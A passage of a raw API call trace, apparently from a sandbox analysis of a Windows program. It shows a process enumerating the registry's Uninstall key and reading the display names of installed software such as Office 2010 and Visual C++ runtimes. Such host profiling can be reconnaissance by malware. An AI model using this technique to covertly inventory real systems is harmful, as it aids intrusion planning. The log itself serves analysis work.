(_Str="{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}") returned 0x26 [0047.608] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.608] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x2f, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x103 [0047.608] RegCloseKey (hKey=0x2b0) returned 0x0 [0047.608] GetCurrentProcess () returned 0xffffffff [0047.608] GetModuleHandleA (lpModuleName="kernel32") returned 0x76600000 [0047.609] GetProcAddress (hModule=0x76600000, lpProcName="IsWow64Process") returned 0x7661195e [0047.609] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x59ffe6c | out: Wow64Process=0x59ffe6c) returned 1 [0047.609] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall", ulOptions=0x0, samDesired=0x20119, phkResult=0x59ffe78 | out: phkResult=0x59ffe78*=0x2b0) returned 0x0 [0047.609] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x0, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="AddressBook", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.609] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="AddressBook", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.609] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x0, lpData=0x0, lpcbData=0x59ffd3c*=0x0) returned 0x2 [0047.609] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.609] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x1, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Connection Manager", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.609] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="Connection Manager", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.609] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x0, lpData=0x0, lpcbData=0x59ffd3c*=0x0) returned 0x2 [0047.609] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.609] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x2, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="DirectDrawEx", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.609] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="DirectDrawEx", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.609] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x0, lpData=0x0, lpcbData=0x59ffd3c*=0x0) returned 0x2 [0047.609] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.609] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x3, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="DXM_Runtime", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.609] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="DXM_Runtime", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.609] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x0, lpData=0x0, lpcbData=0x59ffd3c*=0x0) returned 0x2 [0047.609] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.609] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x4, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Fontcore", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.609] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="Fontcore", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.610] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x0, lpData=0x0, lpcbData=0x59ffd3c*=0x0) returned 0x2 [0047.610] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.610] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x5, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IE40", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.610] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="IE40", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.610] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x0, lpData=0x0, lpcbData=0x59ffd3c*=0x0) returned 0x2 [0047.610] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.610] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x6, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IE4Data", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.610] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="IE4Data", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.610] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x0, lpData=0x0, lpcbData=0x59ffd3c*=0x0) returned 0x2 [0047.610] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.610] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x7, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IE5BAKEX", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.610] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="IE5BAKEX", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.610] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x0, lpData=0x0, lpcbData=0x59ffd3c*=0x0) returned 0x2 [0047.610] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.610] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x8, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IEData", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.610] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="IEData", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.610] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x0, lpData=0x0, lpcbData=0x59ffd3c*=0x0) returned 0x2 [0047.610] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.610] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x9, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="MobileOptionPack", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.610] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="MobileOptionPack", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.610] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x0, lpData=0x0, lpcbData=0x59ffd3c*=0x0) returned 0x2 [0047.611] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.611] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0xa, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="MPlayer2", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.611] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="MPlayer2", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.611] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x0, lpData=0x0, lpcbData=0x59ffd3c*=0x0) returned 0x2 [0047.611] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.611] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0xb, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Office14.PRJPROR", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.611] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="Office14.PRJPROR", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.611] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x48) returned 0x0 [0047.611] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x2621400, lpcbData=0x59ffd3c*=0x48 | out: lpType=0x0, lpData=0x2621400*=0x4d, lpcbData=0x59ffd3c*=0x48) returned 0x0 [0047.611] wcslen (_String="Microsoft Project Professional 2010") returned 0x23 [0047.611] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Project Professional 2010", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0047.611] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Project Professional 2010", cchWideChar=35, lpMultiByteStr=0x26183c8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Project Professional 2010", lpUsedDefaultChar=0x0) returned 35 [0047.611] strlen (_Str="Office14.PRJPROR") returned 0x10 [0047.611] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.611] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0xc, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Office14.PROPLUSR", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.611] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="Office14.PROPLUSR", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.611] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x50) returned 0x0 [0047.611] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x26258a8, lpcbData=0x59ffd3c*=0x50 | out: lpType=0x0, lpData=0x26258a8*=0x4d, lpcbData=0x59ffd3c*=0x50) returned 0x0 [0047.611] wcslen (_String="Microsoft Office Professional Plus 2010") returned 0x27 [0047.611] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Office Professional Plus 2010", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0047.612] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Office Professional Plus 2010", cchWideChar=39, lpMultiByteStr=0x26183f8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Office Professional Plus 2010", lpUsedDefaultChar=0x0) returned 39 [0047.612] strlen (_Str="Office14.PROPLUSR") returned 0x11 [0047.612] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.612] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0xd, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Office14.VISIOR", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.612] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="Office14.VISIOR", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.612] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x44) returned 0x0 [0047.612] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x26047a8, lpcbData=0x59ffd3c*=0x44 | out: lpType=0x0, lpData=0x26047a8*=0x4d, lpcbData=0x59ffd3c*=0x44) returned 0x0 [0047.612] wcslen (_String="Microsoft Visio Professional 2010") returned 0x21 [0047.612] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Visio Professional 2010", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0047.612] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Visio Professional 2010", cchWideChar=33, lpMultiByteStr=0x2618428, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Visio Professional 2010", lpUsedDefaultChar=0x0) returned 33 [0047.612] strlen (_Str="Office14.VISIOR") returned 0xf [0047.612] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.612] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0xe, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="SchedulingAgent", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.612] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="SchedulingAgent", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.612] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x0, lpData=0x0, lpcbData=0x59ffd3c*=0x0) returned 0x2 [0047.612] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.612] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0xf, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="WIC", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.612] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="WIC", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.612] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x0, lpData=0x0, lpcbData=0x59ffd3c*=0x0) returned 0x2 [0047.612] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.612] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x10, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.612] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.612] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x78) returned 0x0 [0047.613] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x2e6a8, lpcbData=0x59ffd3c*=0x78 | out: lpType=0x0, lpData=0x2e6a8*=0x4d, lpcbData=0x59ffd3c*=0x78) returned 0x0 [0047.613] wcslen (_String="Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219") returned 0x3b [0047.613] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219", cchWideChar=59, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 59 [0047.613] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219", cchWideChar=59, lpMultiByteStr=0x261fe38, cbMultiByte=59, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219", lpUsedDefaultChar=0x0) returned 59 [0047.613] strlen (_Str="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}") returned 0x26 [0047.613] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.613] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x11, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{37B8F9C7-03FB-3253-8781-2517C99D7C00}", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.613] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{37B8F9C7-03FB-3253-8781-2517C99D7C00}", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.613] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x7c) returned 0x0 [0047.613] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x2e6a8, lpcbData=0x59ffd3c*=0x7c | out: lpType=0x0, lpData=0x2e6a8*=0x4d, lpcbData=0x59ffd3c*=0x7c) returned 0x0 [0047.613] wcslen (_String="Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.61030") returned 0x3d [0047.613] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.61030", cchWideChar=61, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0047.613] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.61030", cchWideChar=61, lpMultiByteStr=0x261fda8, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.61030", lpUsedDefaultChar=0x0) returned 61 [0047.613] strlen (_Str="{37B8F9C7-03FB-3253-8781-2517C99D7C00}") returned 0x26 [0047.613] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.613] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x12, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.613] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.613] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x7e) returned 0x0 [0047.613] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x2e6a8, lpcbData=0x59ffd3c*=0x7e | out: lpType=0x0, lpData=0x2e6a8*=0x4d, lpcbData=0x59ffd3c*=0x7e) returned 0x0 [0047.613] wcslen (_String="Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161") returned 0x3e [0047.613] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0047.613] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161", cchWideChar=62, lpMultiByteStr=0x261fdf0, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161", lpUsedDefaultChar=0x0) returned 62 [0047.613] strlen (_Str="{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}") returned 0x26 [0047.613] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.613] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x13, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.614] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.614] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x78) returned 0x0 [0047.614] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x2e6a8, lpcbData=0x59ffd3c*=0x78 | out: lpType=0x0, lpData=0x2e6a8*=0x4d, lpcbData=0x59ffd3c*=0x78) returned 0x0 [0047.614] wcslen (_String="Microsoft Visual C++ 2017 x64 Minimum Runtime - 14.10.25017") returned 0x3b [0047.614] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Visual C++ 2017 x64 Minimum Runtime - 14.10.25017", cchWideChar=59, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 59 [0047.614] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft Visual C++ 2017 x64 Minimum Runtime - 14.10.25017", cchWideChar=59, lpMultiByteStr=0x261fec8, cbMultiByte=59, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft Visual C++ 2017 x64 Minimum Runtime - 14.10.25017", lpUsedDefaultChar=0x0) returned 59 [0047.614] strlen (_Str="{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}") returned 0x26 [0047.614] RegCloseKey (hKey=0x2b8) returned 0x0 [0047.614] RegEnumKeyExA (in: hKey=0x2b0, dwIndex=0x14, lpName=0x59ffd68, lpcchName=0x59ffe70, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{90140000-0015-0409-1000-0000000FF1CE}", lpcchName=0x59ffe70, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0047.614] RegOpenKeyExA (in: hKey=0x2b0, lpSubKey="{90140000-0015-0409-1000-0000000FF1CE}", ulOptions=0x0, samDesired=0x20019, phkResult=0x59ffe74 | out: phkResult=0x59ffe74*=0x2b8) returned 0x0 [0047.614] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x59ffd38, lpData=0x0, lpcbData=0x59ffd3c*=0x0 | out: lpType=0x59ffd38*=0x1, lpData=0x0, lpcbData=0x59ffd3c*=0x56) returned 0x0 [0047.614] RegQueryValueExW (in: hKey=0x2b8, lpValueName="DisplayName", lpReserved=0x0, lpType=0x0, lpData=0x26258a8, lpcbData=0x59ffd3c*=0x56 | out: lpType=0x0, lpData=0x26258a8*=0x4d, lpcbData=0x59ffd3c*=0x56) returned 0x0 [0047.614] wcslen (_String="Microsoft Office Access MUI (English) 2010") returned 0x2a [0047.614] WideCharToMultiByte (in: 